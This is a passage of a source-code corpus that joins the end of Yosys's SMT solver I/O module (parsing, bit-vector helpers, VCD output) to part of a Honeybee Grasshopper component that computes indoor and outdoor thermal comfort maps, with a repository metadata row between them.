                        m = "(%d seconds -- %d:%02d:%02d)" % (secs, secs // (60*60), (secs // 60) % 60, secs % 60)
                    print("%s %s %c" % ("\b \b" * num_bs, m, s[i]), end="", file=sys.stderr)
                    num_bs = len(m) + 3
                else:
                    print("\b" + s[i], end="", file=sys.stderr)
                sys.stderr.flush()
                i = (i + 1) % len(s)
            if num_bs != 0:
                # Erase the spinner once the solver has answered.
                print("\b \b" * num_bs, end="", file=sys.stderr)
                sys.stderr.flush()
        else:
            # Non-interactive mode: log a message at growing intervals
            # (polled in 60 s steps).
            count = 0
            while self.p_poll(60):
                count += 1
                msg = None
                if count == 1:
                    msg = "1 minute"
                elif count in [5, 10, 15, 30]:
                    msg = "%d minutes" % count
                elif count == 60:
                    msg = "1 hour"
                elif count % 60 == 0:
                    msg = "%d hours" % (count // 60)
                if msg is not None:
                    print("%s waiting for solver (%s)" % (self.timestamp(), msg), flush=True)
    if self.forall:
        # In forall mode the solver may print diagnostic lines before
        # the final verdict; echo them and keep reading.
        result = self.read()
        while result not in ["sat", "unsat", "unknown", "timeout", "interrupted", ""]:
            print("%s %s: %s" % (self.timestamp(), self.solver, result))
            result = self.read()
    else:
        result = self.read()
    if self.debug_file:
        print("(set-info :status %s)" % result, file=self.debug_file)
        print("(check-sat)", file=self.debug_file)
        self.debug_file.flush()
    if result not in expected:
        if result == "":
            print("%s Unexpected EOF response from solver." % (self.timestamp()), flush=True)
        else:
            print("%s Unexpected response from solver: %s" % (self.timestamp(), result), flush=True)
        if self.solver != "dummy":
            self.p_close()
        sys.exit(1)
    return result
def parse(self, stmt):
    """Parse an SMT2 S-expression string into nested Python lists.

    Atoms become strings (|quoted| symbols keep their bars); no
    unquoting or numeric conversion is performed.
    """
    def scan(text):
        # Returns (value, number_of_characters_consumed).
        head = text[0]
        if head == '(':
            items = []
            pos = 1
            while text[pos] != ')':
                value, used = scan(text[pos:])
                items.append(value)
                pos += used
            return items, pos + 1
        if head == '|':
            pos = text.index('|', 1)
            return text[:pos + 1], pos + 1
        if head in " \t\r\n":
            value, used = scan(text[1:])
            return value, used + 1
        pos = 0
        while text[pos] not in "()| \t\r\n":
            pos += 1
        return text[:pos], pos

    return scan(stmt)[0]
def unparse(self, stmt):
    """Inverse of parse(): render nested lists back into SMT2 text."""
    if not isinstance(stmt, list):
        return stmt
    return "(" + " ".join(self.unparse(element) for element in stmt) + ")"
def bv2hex(self, v):
    """Convert a bit-vector constant to a lowercase hex string.

    The last (least significant) nibble may cover fewer than four bits,
    so e.g. a 5-bit value produces two hex digits.
    """
    bits = self.bv2bin(v)
    digits = []
    while bits:
        digits.append("%x" % int(bits[-4:], 2))
        bits = bits[:-4]
    return "".join(reversed(digits))
def bv2bin(self, v):
    """Normalize a bit-vector constant to a plain binary digit string.

    Accepts (_ bvN W) lists, "true"/"false", and "#b"/"#x" literals.
    """
    if type(v) is list and len(v) == 3 and v[0] == "_" and v[1].startswith("bv"):
        # (_ bvN W): decimal value N rendered as W binary digits, MSB first.
        value = int(v[1][2:])
        width = int(v[2])
        return "".join("1" if value & (1 << bit) else "0" for bit in reversed(range(width)))
    if v == "true":
        return "1"
    if v == "false":
        return "0"
    if v.startswith("#b"):
        return v[2:]
    if v.startswith("#x"):
        # Expand each hex digit to 4 bits via the module-level hex_dict.
        return "".join(hex_dict.get(digit) for digit in v[2:])
    assert False
def bv2int(self, v):
    """Return the unsigned integer value of a bit-vector constant."""
    bits = self.bv2bin(v)
    return int(bits, 2)
def get(self, expr):
    """Query the solver for the value of *expr* in the current model."""
    self.write("(get-value (%s))" % expr)
    response = self.parse(self.read())
    return response[0][1]
def get_list(self, expr_list):
    """Query the solver for the values of several expressions at once."""
    if not expr_list:
        return []
    self.write("(get-value (%s))" % " ".join(expr_list))
    return [entry[1] for entry in self.parse(self.read())]
def get_path(self, mod, path):
    """Split a dotted net path into per-module hierarchy segments.

    The longest prefix naming a cell of *mod* becomes one segment; the
    rest is resolved recursively in that cell's module.  Backslashes
    are normalized to forward slashes first.
    """
    assert mod in self.modinfo
    parts = path.replace("\\", "/").split(".")
    cells = self.modinfo[mod].cells
    for split in range(1, len(parts)):
        prefix = ".".join(parts[:split])
        if prefix in cells:
            remainder = ".".join(parts[split:])
            return [prefix] + self.get_path(cells[prefix], remainder)
    return [".".join(parts)]
def net_expr(self, mod, base, path):
    """Build the SMT2 accessor expression for a cell, net, or memory.

    *base* is the state expression for module *mod*; *path* is a list
    of hierarchy names as produced by get_path().
    """
    if not path:
        return base
    if len(path) == 1:
        assert mod in self.modinfo
        name = path[0]
        if name == "":
            return base
        info = self.modinfo[mod]
        if name in info.cells:
            return "(|%s_h %s| %s)" % (mod, name, base)
        if name in info.wsize:
            return "(|%s_n %s| %s)" % (mod, name, base)
        if name in info.memories:
            return "(|%s_m %s| %s)" % (mod, name, base)
        assert 0
    assert mod in self.modinfo
    assert path[0] in self.modinfo[mod].cells
    submod = self.modinfo[mod].cells[path[0]]
    subbase = "(|%s_h %s| %s)" % (mod, path[0], base)
    return self.net_expr(submod, subbase, path[1:])
def net_width(self, mod, net_path):
    """Return the bit width of the net at *net_path* below *mod*."""
    for cell in net_path[:-1]:
        assert mod in self.modinfo
        assert cell in self.modinfo[mod].cells
        mod = self.modinfo[mod].cells[cell]
    assert mod in self.modinfo
    assert net_path[-1] in self.modinfo[mod].wsize
    return self.modinfo[mod].wsize[net_path[-1]]
def net_clock(self, mod, net_path):
    """Return the clock edge type for the net, or None if not a clock."""
    for cell in net_path[:-1]:
        assert mod in self.modinfo
        assert cell in self.modinfo[mod].cells
        mod = self.modinfo[mod].cells[cell]
    assert mod in self.modinfo
    return self.modinfo[mod].clocks.get(net_path[-1])
def net_exists(self, mod, net_path):
    """Check whether *net_path* resolves to a known net below *mod*."""
    for cell in net_path[:-1]:
        if mod not in self.modinfo:
            return False
        if cell not in self.modinfo[mod].cells:
            return False
        mod = self.modinfo[mod].cells[cell]
    if mod not in self.modinfo:
        return False
    return net_path[-1] in self.modinfo[mod].wsize
def mem_exists(self, mod, mem_path):
    """Check whether *mem_path* resolves to a known memory below *mod*."""
    for cell in mem_path[:-1]:
        if mod not in self.modinfo:
            return False
        if cell not in self.modinfo[mod].cells:
            return False
        mod = self.modinfo[mod].cells[cell]
    if mod not in self.modinfo:
        return False
    return mem_path[-1] in self.modinfo[mod].memories
def mem_expr(self, mod, base, path, port=None, infomode=False):
    """Resolve a memory path below *mod*.

    With infomode=True the recorded memory info tuple is returned;
    otherwise an SMT2 accessor expression (optionally for a specific
    *port*) is built around *base*.
    """
    if len(path) == 1:
        assert mod in self.modinfo
        assert path[0] in self.modinfo[mod].memories
        if infomode:
            return self.modinfo[mod].memories[path[0]]
        suffix = "" if port is None else ":%s" % port
        return "(|%s_m%s %s| %s)" % (mod, suffix, path[0], base)
    assert mod in self.modinfo
    assert path[0] in self.modinfo[mod].cells
    submod = self.modinfo[mod].cells[path[0]]
    subbase = "(|%s_h %s| %s)" % (mod, path[0], base)
    return self.mem_expr(submod, subbase, path[1:], port=port, infomode=infomode)
def mem_info(self, mod, path):
    """Shortcut for mem_expr() in infomode: return the memory info tuple."""
    info = self.mem_expr(mod, "", path, infomode=True)
    return info
def get_net(self, mod_name, net_path, state_name):
    """Fetch the model value of one net in the given state."""
    expr = self.net_expr(mod_name, state_name, net_path)
    return self.get(expr)
def get_net_list(self, mod_name, net_path_list, state_name):
    """Fetch model values for several nets in the given state."""
    exprs = [self.net_expr(mod_name, state_name, p) for p in net_path_list]
    return self.get_list(exprs)
def get_net_hex(self, mod_name, net_path, state_name):
    """Fetch one net value and format it as a hex string."""
    value = self.get_net(mod_name, net_path, state_name)
    return self.bv2hex(value)
def get_net_hex_list(self, mod_name, net_path_list, state_name):
    """Fetch several net values and format each as a hex string."""
    values = self.get_net_list(mod_name, net_path_list, state_name)
    return [self.bv2hex(value) for value in values]
def get_net_bin(self, mod_name, net_path, state_name):
    """Fetch one net value and format it as a binary string."""
    value = self.get_net(mod_name, net_path, state_name)
    return self.bv2bin(value)
def get_net_bin_list(self, mod_name, net_path_list, state_name):
    """Fetch several net values and format each as a binary string."""
    values = self.get_net_list(mod_name, net_path_list, state_name)
    return [self.bv2bin(value) for value in values]
def wait(self):
    # Block until the solver process exits, then tear down its state.
    if self.p is not None:
        self.p.wait()
        self.p_close()
class SmtOpts:
    """Getopt-compatible option handling for the SMT solver layer.

    Tools merge self.shortopts/self.longopts into their own getopt
    spec and forward unrecognized options to handle().
    """

    def __init__(self):
        self.shortopts = "s:S:v"
        self.longopts = ["unroll", "noincr", "noprogress", "timeout=", "dump-smt2=", "logic=", "dummy=", "info=", "nocomments"]
        self.solver = "yices"
        self.solver_opts = list()
        self.debug_print = False
        self.debug_file = None
        self.dummy_file = None
        self.unroll = False
        self.noincr = False
        self.timeinfo = os.name != "nt"  # no progress spinner on Windows
        self.timeout = 0
        self.logic = None
        self.info_stmts = list()
        self.nocomments = False

    def handle(self, o, a):
        """Consume one getopt option/argument pair.

        Returns True when the option belongs to SmtOpts, False so the
        caller can process its own options otherwise.
        """
        actions = {
            "-s": lambda: setattr(self, "solver", a),
            "-S": lambda: self.solver_opts.append(a),
            "--timeout": lambda: setattr(self, "timeout", int(a)),
            "-v": lambda: setattr(self, "debug_print", True),
            "--unroll": lambda: setattr(self, "unroll", True),
            "--noincr": lambda: setattr(self, "noincr", True),
            "--noprogress": lambda: setattr(self, "timeinfo", False),
            "--dump-smt2": lambda: setattr(self, "debug_file", open(a, "w")),
            "--logic": lambda: setattr(self, "logic", a),
            "--dummy": lambda: setattr(self, "dummy_file", a),
            "--info": lambda: self.info_stmts.append(a),
            "--nocomments": lambda: setattr(self, "nocomments", True),
        }
        if o not in actions:
            return False
        actions[o]()
        return True

    def helpmsg(self):
        """Return the usage text describing the options above."""
        return """
    -s <solver>
        set SMT solver: z3, yices, boolector, cvc4, mathsat, dummy
        default: yices

    -S <opt>
        pass <opt> as command line argument to the solver

    --timeout <value>
        set the solver timeout to the specified value (in seconds).

    --logic <smt2_logic>
        use the specified SMT2 logic (e.g. QF_AUFBV)

    --dummy <filename>
        if solver is "dummy", read solver output from that file
        otherwise: write solver output to that file

    -v
        enable debug output

    --unroll
        unroll uninterpreted functions

    --noincr
        don't use incremental solving, instead restart solver for
        each (check-sat). This also avoids (push) and (pop).

    --noprogress
        disable timer display during solving
        (this option is set implicitly on Windows)

    --dump-smt2 <filename>
        write smt2 statements to file

    --info <smt2-info-stmt>
        include the specified smt2 info statement in the smt2 output

    --nocomments
        strip all comments from the generated smt2 code
"""
class MkVcd:
    # Minimal VCD (Value Change Dump) writer for smt_step-indexed
    # waveforms.  Nets are registered first; the header is emitted
    # lazily on the first set_time() call.
    def __init__(self, f):
        self.f = f            # output file object
        self.t = -1           # current time step; -1 = header not yet written
        self.nets = dict()    # path tuple -> (vcd id, width)
        self.clocks = dict()  # path tuple -> (vcd id, edge type)

    def add_net(self, path, width):
        # Register a net; only allowed before the first set_time().
        path = tuple(path)
        assert self.t == -1
        key = "n%d" % len(self.nets)
        self.nets[path] = (key, width)

    def add_clock(self, path, edge):
        # Register a 1-bit clock net; its waveform is synthesized from
        # the edge type in set_time() rather than via set_net().
        path = tuple(path)
        assert self.t == -1
        key = "n%d" % len(self.nets)
        self.nets[path] = (key, 1)
        self.clocks[path] = (key, edge)

    def set_net(self, path, bits):
        # Emit a value change for a registered (non-clock) net.
        path = tuple(path)
        assert self.t >= 0
        assert path in self.nets
        if path not in self.clocks:
            print("b%s %s" % (bits, self.nets[path][0]), file=self.f)

    def escape_name(self, name):
        # Rewrite [index] suffixes that contain identifier characters
        # into <index> form.
        name = re.sub(r"\[([0-9a-zA-Z_]*[a-zA-Z_][0-9a-zA-Z_]*)\]", r"<\1>", name)
        # NOTE(review): re.match only tests the first character, so a
        # bracket later in the name never triggers the escape -- confirm
        # whether re.search was intended.
        if re.match("[\[\]]", name) and name[0] != "\\":
            name = "\\" + name
        return name

    def set_time(self, t):
        # Advance to time step t (monotonic).  On the first call the
        # full VCD header ($scope/$var tree) is written.
        assert t >= self.t
        if t != self.t:
            if self.t == -1:
                print("$version Generated by Yosys-SMTBMC $end", file=self.f)
                print("$timescale 1ns $end", file=self.f)
                print("$var integer 32 t smt_step $end", file=self.f)
                print("$var event 1 ! smt_clock $end", file=self.f)

                def vcdescape(n):
                    # Escape identifiers that VCD viewers would reject.
                    if n.startswith("$") or ":" in n:
                        return "\\" + n
                    return n

                # Walk nets in sorted order, opening/closing $scope
                # sections as the hierarchy prefix changes.
                scope = []
                for path in sorted(self.nets):
                    key, width = self.nets[path]
                    uipath = list(path)
                    # Split dotted leaf names (but not $-internal ones)
                    # into additional scope levels.
                    if "." in uipath[-1] and not uipath[-1].startswith("$"):
                        uipath = uipath[0:-1] + uipath[-1].split(".")
                    for i in range(len(uipath)):
                        uipath[i] = re.sub(r"\[([^\]]*)\]", r"<\1>", uipath[i])
                    while uipath[:len(scope)] != scope:
                        print("$upscope $end", file=self.f)
                        scope = scope[:-1]
                    while uipath[:-1] != scope:
                        scopename = uipath[len(scope)]
                        print("$scope module %s $end" % vcdescape(scopename), file=self.f)
                        scope.append(uipath[len(scope)])
                    if path in self.clocks and self.clocks[path][1] == "event":
                        print("$var event 1 %s %s $end" % (key, vcdescape(uipath[-1])), file=self.f)
                    else:
                        print("$var wire %d %s %s $end" % (width, key, vcdescape(uipath[-1])), file=self.f)
                for i in range(len(scope)):
                    print("$upscope $end", file=self.f)
                print("$enddefinitions $end", file=self.f)

            self.t = t
            assert self.t >= 0

            if self.t > 0:
                # Mid-step timestamp: drive the inactive clock phase so
                # each smt_step renders as a full clock cycle.
                print("#%d" % (10 * self.t - 5), file=self.f)
                for path in sorted(self.clocks.keys()):
                    if self.clocks[path][1] == "posedge":
                        print("b0 %s" % self.nets[path][0], file=self.f)
                    elif self.clocks[path][1] == "negedge":
                        print("b1 %s" % self.nets[path][0], file=self.f)

            # Step timestamp: pulse smt_clock, update the smt_step
            # counter, and drive the active clock phase.
            print("#%d" % (10 * self.t), file=self.f)
            print("1!", file=self.f)
            print("b%s t" % format(self.t, "032b"), file=self.f)

            for path in sorted(self.clocks.keys()):
                if self.clocks[path][1] == "negedge":
                    print("b0 %s" % self.nets[path][0], file=self.f)
                else:
                    print("b1 %s" % self.nets[path][0], file=self.f)
|
SymbiFlow/yosys
|
backends/smt2/smtio.py
|
Python
|
isc
| 40,983
|
[
"BLAST"
] |
1a48ed3d73e18c518266a09a58a348bef97cae2923a7a4442b1aff38ba8c9778
|
# This component runs an annual comfort assessment off of EnergyPlus results
#
# Honeybee: A Plugin for Environmental Analysis (GPL) started by Mostapha Sadeghipour Roudsari
#
# This file is part of Honeybee.
#
# Copyright (c) 2013-2015, Chris Mackey <Chris@MackeyArchitecture.com>
# Honeybee is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 3 of the License,
# or (at your option) any later version.
#
# Honeybee is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Honeybee; If not, see <http://www.gnu.org/licenses/>.
#
# @license GPL-3.0+ <http://spdx.org/licenses/GPL-3.0+>
"""
Use this component to run an annual comfort assessment off of EnergyPlus results and write all values into csv files.
The results in these files can be used for creating indoor comfort maps.
-
Provided by Honeybee 0.0.57
Args:
_comfAnalysisRecipe: A comfort analysis recipe out of one of the comfort recipe component.
=============: ...
workingDir_: An optional working directory on your system. Default is set to C:\Ladybug
fileName_: An optional file name for the result files as a string.
=============: ...
analysisPeriodOrHOY_: An analysis period from the 'Ladybug Analysis Period' component or an hour of the analysis between 1 and 8760 for which you want to conduct the analysis. If no value is connected here, the component will run for only noon on the winter solstice. A single HOY is used by default as longer analysis periods can take a very long time.
=============: ...
writeResultFile_: Set to 1 or 'True' to have the component write all results into CSV result files and set to 0 or 'False' to not have the component write these files. The default is set to 'True' as these simulations can be long and you usually want a copy of your results. You may want to set it to 'False' if you are just scrolling through key hours and want the fastest run possible. Set to 2 if you want the component to only write the results of the last two matrices (comfort results and degFromTarget).
parallel_: Set to "True" to run the component using multiple CPUs. This can dramatically decrease calculation time but can interfere with other intense computational processes that might be running on your machine. For this reason, the default is set to 'False.'
_runIt: Set boolean to "True" to run the component and generate files for an annual indoor comfort assessment.
Returns:
readMe!: ...
===============: ...
radTempMtx: A python matrix containing MRT data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component.
airTempMtx: A python matrix containing air temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component.
operativeTempMtx: A python matrix containing operative temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component.
adaptComfMtx: A python matrix containing adaptive comfort data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component.
degFromTargetMtx: A python matrix containing degrees from target temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component.
===============: ...
radTempResult: A csv file address containing the radiant temperature results for each point for every hour of the analysis.
airTempResult: A csv file address containing the air temperature results for each point for every hour of the analysis.
operativeTempResult: A csv file address containing the operative temperature results for each point for every hour of the analysis.
adaptComfResult: A csv file address containing a series of 0's and 1's indicating whether a certain point is comfortable for every hour of the analysis.
degFromTargetResult: A csv file address containing a series of numbers indicating the degrees that a certain point is from the neutral temperature for every hour of the analysis.
"""
# Grasshopper component metadata (shown on the canvas and in tooltips).
ghenv.Component.Name = "Honeybee_Microclimate Map Analysis"
ghenv.Component.NickName = 'MicroclimateMap'
ghenv.Component.Message = 'VER 0.0.57\nAUG_30_2015'
ghenv.Component.Category = "Honeybee"
ghenv.Component.SubCategory = "09 | Energy | Energy"
#compatibleHBVersion = VER 0.0.56\nFEB_01_2015
#compatibleLBVersion = VER 0.0.59\nJUL_06_2015
try: ghenv.Component.AdditionalHelpFromDocStrings = "6"
except: pass  # older Grasshopper builds lack this property
from System import Object
from System import Drawing
import System
import Grasshopper.Kernel as gh
from Grasshopper import DataTree
from Grasshopper.Kernel.Data import GH_Path
import Rhino as rc
import scriptcontext as sc
import math
import os
import System.Threading.Tasks as tasks
# Shorthand for emitting Grasshopper warning balloons.
w = gh.GH_RuntimeMessageLevel.Warning
# Active Rhino document tolerance, used for geometric comparisons.
tol = sc.doc.ModelAbsoluteTolerance
# Output metadata for the Adaptive comfort recipe: index on the
# Grasshopper component -> [output name, description].  Typos in the
# user-facing descriptions fixed ("tartget", "resultsfor", "the a").
outputsDictAdapt = {
0: ["readMe!", "..."],
1: ["===============", "..."],
2: ["radTempMtx", "A python matrix containing MRT data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
3: ["airTempMtx", "A python matrix containing air temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
4: ["operativeTempMtx", "A python matrix containing operative temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
5: ["adaptComfMtx", "A python matrix containing adaptive comfort data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
6: ["degFromTargetMtx", "A python matrix containing degrees from target temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
7: ["===============", "..."],
8: ["radTempResult", "A csv file address containing the radiant temperature results for each point for every hour of the analysis."],
9: ["airTempResult", "A csv file address containing the air temperature results for each point for every hour of the analysis."],
10: ["operativeTempResult", "A csv file address containing the operative temperature results for each point for every hour of the analysis."],
11: ["adaptComfResult", "A csv file address containing a series of 0's and 1's indicating whether a certain point is comfortable for every hour of the analysis."],
12: ["degFromTargetResult", "A csv file address containing a series of numbers indicating the degrees that a certain point is from the neutral temperature for every hour of the analysis."]
}
# Output metadata for the PMV comfort recipe: index on the Grasshopper
# component -> [output name, description].  Typos in the user-facing
# descriptions fixed ("resultsfor", "the a series").
outputsDictPMV = {
0: ["readMe!", "..."],
1: ["===============", "..."],
2: ["radTempMtx", "A python matrix containing MRT data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
3: ["airTempMtx", "A python matrix containing air temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
4: ["SET_Mtx", "A python matrix containing standard effective temperature (SET) data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
5: ["PMVComfMtx", "A python matrix containing PMV comfort data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
6: ["PMV_Mtx", "A python matrix containing predicted mean vote (PMV) data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
7: ["===============", "..."],
8: ["radTempResult", "A csv file address containing the radiant temperature results for each point for every hour of the analysis."],
9: ["airTempResult", "A csv file address containing the air temperature results for each point for every hour of the analysis."],
10: ["SET_Result", "A csv file address containing the standard effective temperature (SET) results for each point for every hour of the analysis."],
11: ["PMVComfResult", "A csv file address containing a series of 0's and 1's indicating whether a certain point is comfortable for every hour of the analysis."],
12: ["PMV_Result", "A csv file address containing predicted mean vote (PMV) results indicating the distance that a certain point is from the neutral temperature for every hour of the analysis."]
}
# Output metadata for the UTCI (outdoor) comfort recipe: index on the
# Grasshopper component -> [output name, description].  Typos in the
# user-facing descriptions fixed ("resultsfor", "the a series").
outputsDictUTCI = {
0: ["readMe!", "..."],
1: ["===============", "..."],
2: ["radTempMtx", "A python matrix containing MRT data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
3: ["airTempMtx", "A python matrix containing air temperature data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
4: ["UTCI_Mtx", "A python matrix containing universal thermal climate index (UTCI) data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
5: ["OutdoorComfMtx", "A python matrix containing outdoor (UTCI) comfort data for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
6: ["DegFromNeutralMtx", "A python matrix containing the degrees from the neutral UTCI value of 20 C for every hour of the analysis to be plugged into the 'Honeybee_Visualize Annual Comfort Results' component."],
7: ["===============", "..."],
8: ["radTempResult", "A csv file address containing the radiant temperature results for each point for every hour of the analysis."],
9: ["airTempResult", "A csv file address containing the air temperature results for each point for every hour of the analysis."],
10: ["UTCI_Result", "A csv file address containing universal thermal climate index (UTCI) results for each point for every hour of the analysis."],
11: ["OutdoorComfResult", "A csv file address containing a series of 0's and 1's indicating whether a certain point is comfortable for every hour of the analysis."],
12: ["DegFromNeutralResult", "A csv file address containing the degrees from the neutral UTCI value of 20 C indicating the distance that a certain point is from the neutral temperature for every hour of the analysis."]
}
def setDefaults(lb_defaultFolder, lb_preparation):
    # Resolve the component's global inputs (fileName_, workingDir_,
    # analysisPeriodOrHOY_) into concrete settings.
    # Returns (checkData, HOYs, analysisPeriod, fileName, workingDir).
    #Set a default fileName.
    if fileName_ == None:
        fileName = 'unnamed'
    else: fileName = fileName_.strip()
    #Check the directory or set a default.
    if workingDir_: workingDir = lb_preparation.removeBlankLight(workingDir_)
    else: workingDir = lb_defaultFolder
    workingDir = os.path.join(workingDir, fileName, "ComfortAnalysis")
    workingDir = lb_preparation.makeWorkingDir(workingDir)
    #Check the HOYs.
    #Make the default analyisis period for the whole analysis if the user has not input one.
    checkData1 = True
    analysisPeriod = []
    HOYs = []
    if analysisPeriodOrHOY_ == []:
        # Default: noon on the winter solstice (HOY 8508).
        analysisPeriod = [(12, 21, 12), (12, 21, 12)]
        HOYs = [8508]
    else:
        #Check if the analysis period is an hour of the analysis or an HOY
        try:
            # Single number input: treat it as an hour of the year.
            HOYs = [int(analysisPeriodOrHOY_[0])]
            if HOYs[0] < 1 or HOYs[0] > 8760:
                checkData1 = False
                warning = 'Hour of the analysis input for analysisPeriodOrHOY_ must be either a value between 1 and 8760.'
                print warning
                ghenv.Component.AddRuntimeMessage(gh.GH_RuntimeMessageLevel.Warning, warning)
            if checkData1 == True:
                d, m, t = lb_preparation.hour2Date(HOYs[0], True)
                analysisPeriod = [(m, d, t), (m, d, t)]
        except:
            # Not a number: try interpreting it as a Ladybug analysis period.
            try:
                HOYs, months, days = lb_preparation.getHOYsBasedOnPeriod(analysisPeriodOrHOY_, 1)
                analysisPeriod = analysisPeriodOrHOY_
            except:
                checkData1 = False
                warning = 'Invalid input for analysisPeriodOrHOY_.'
                print warning
                ghenv.Component.AddRuntimeMessage(gh.GH_RuntimeMessageLevel.Warning, warning)
    #Do a final check of everything.
    if checkData1 == True:
        checkData = True
    else: checkData = False
    return checkData, HOYs, analysisPeriod, fileName, workingDir
def manageOutput(comfortModel):
    """Relabel the component's 13 outputs for the active comfort model, blanking
    out any outputs that the writeResultFile_ setting will not produce."""
    # Pick the label dictionary for the requested model; the Adaptive labels
    # double as the fallback for unrecognized model names.
    if comfortModel == "PMV":
        labelDict = outputsDictPMV
    elif comfortModel == "UTCI":
        labelDict = outputsDictUTCI
    else:
        labelDict = outputsDictAdapt
    for outIndex in range(13):
        outParam = ghenv.Component.Params.Output[outIndex]
        # Outputs 8-12 are suppressed entirely when no result files are written;
        # outputs 8-10 are suppressed when only comfort results are written.
        blankOut = False
        if outIndex > 7 and writeResultFile_ == 0:
            blankOut = True
        elif 7 < outIndex < 11 and writeResultFile_ == 2:
            blankOut = True
        if blankOut:
            outParam.NickName = "__________"
            outParam.Name = "."
            outParam.Description = " "
        else:
            outParam.NickName = labelDict[outIndex][0]
            outParam.Name = labelDict[outIndex][0]
            outParam.Description = labelDict[outIndex][1]
#Define a function to duplicate data
def duplicateData(data, calcLength):
    """Return a list containing the first item of `data` repeated calcLength times."""
    return [data[0] for _ in range(calcLength)]
def processPrevailOutdoorTemp(prevailingOutdoorTemp, avgMonthOrRunMean):
    """Expand annual outdoor dry-bulb data into an hourly "prevailing temperature" list.

    prevailingOutdoorTemp: annual EPW temperature list INCLUDING the 7-item
        Ladybug header (all slices below account for that offset).
    avgMonthOrRunMean: True  -> use monthly average temperatures;
                       False -> use an exponentially-weighted daily running mean
                                (alpha = 0.8, EN-15251 style), seeded from the
                                last six days of the year.
    Returns (prevailTemp, coldTimes):
        prevailTemp - one prevailing-temperature value per hour of the year.
        coldTimes   - month indices (monthly mode) or day numbers (running-mean
                      mode) whose prevailing temperature fell below 10 C, i.e.
                      outside the official adaptive comfort model range.
    """
    prevailTemp = []
    coldTimes = []
    if avgMonthOrRunMean == True:
        #Calculate the monthly average temperatures.
        monthPrevailList = [float(sum(prevailingOutdoorTemp[7:751])/744), float(sum(prevailingOutdoorTemp[751:1423])/672), float(sum(prevailingOutdoorTemp[1423:2167])/744), float(sum(prevailingOutdoorTemp[2167:2887])/720), float(sum(prevailingOutdoorTemp[2887:3631])/744), float(sum(prevailingOutdoorTemp[3631:4351])/720), float(sum(prevailingOutdoorTemp[4351:5095])/744), float(sum(prevailingOutdoorTemp[5095:5839])/744), float(sum(prevailingOutdoorTemp[5839:6559])/720), float(sum(prevailingOutdoorTemp[6559:7303])/744), float(sum(prevailingOutdoorTemp[7303:8023])/720), float(sum(prevailingOutdoorTemp[8023:])/744)]
        hoursInMonth = [744, 672, 744, 720, 744, 720, 744, 744, 720, 744, 720, 744]
        for monthCount, monthPrevailTemp in enumerate(monthPrevailList):
            prevailTemp.extend([monthPrevailTemp] * hoursInMonth[monthCount])
            if monthPrevailTemp < 10: coldTimes.append(monthCount)
    else:
        #Calculate a running mean temperature.
        alpha = 0.8
        divisor = 1 + alpha + math.pow(alpha,2) + math.pow(alpha,3) + math.pow(alpha,4) + math.pow(alpha,5)
        dividend = (sum(prevailingOutdoorTemp[-24:-1] + [prevailingOutdoorTemp[-1]])/24) + (alpha*(sum(prevailingOutdoorTemp[-48:-24])/24)) + (math.pow(alpha,2)*(sum(prevailingOutdoorTemp[-72:-48])/24)) + (math.pow(alpha,3)*(sum(prevailingOutdoorTemp[-96:-72])/24)) + (math.pow(alpha,4)*(sum(prevailingOutdoorTemp[-120:-96])/24)) + (math.pow(alpha,5)*(sum(prevailingOutdoorTemp[-144:-120])/24))
        #BUG FIX: the weighted sum of past daily means must be divided by the
        #normalizing factor (1 + alpha + ... + alpha^5), i.e. dividend/divisor.
        #The original computed divisor/dividend, yielding a near-zero seed
        #temperature that wrongly flagged day 0 as "cold".
        startingTemp = dividend/divisor
        if startingTemp < 10: coldTimes.append(0)
        outdoorTemp = prevailingOutdoorTemp[7:]
        startingMean = sum(outdoorTemp[:24])/24
        dailyRunMeans = [startingTemp]
        dailyMeans = [startingMean]
        prevailTemp.extend([startingTemp] * 24)
        startHour = 24
        for count in range(364):
            dailyMean = sum(outdoorTemp[startHour:startHour+24])/24
            #theta_rm(today) = (1-alpha)*theta_mean(yesterday) + alpha*theta_rm(yesterday)
            dailyRunMeanTemp = ((1-alpha)*dailyMeans[-1]) + alpha*dailyRunMeans[-1]
            if dailyRunMeanTemp < 10: coldTimes.append(count+1)
            prevailTemp.extend([dailyRunMeanTemp] * 24)
            dailyRunMeans.append(dailyRunMeanTemp)
            dailyMeans.append(dailyMean)
            startHour +=24
    return prevailTemp, coldTimes
def calculatePointMRT(srfTempDict, testPtsViewFactor, hour, originalHour, outdoorClac, outSrfTempDict, outdoorNonSrfViewFac, prevailingOutdoorTemp):
    """Compute a view-factor-weighted mean radiant temperature for every test point.

    Indoor zones weight the indoor surface temperatures (srfTempDict) by each
    point's per-surface view factors; when outdoorClac is on, the last zone in
    testPtsViewFactor is treated as the outdoor case, using outSrfTempDict plus
    the sky/ground view fraction weighted by the prevailing outdoor temperature.
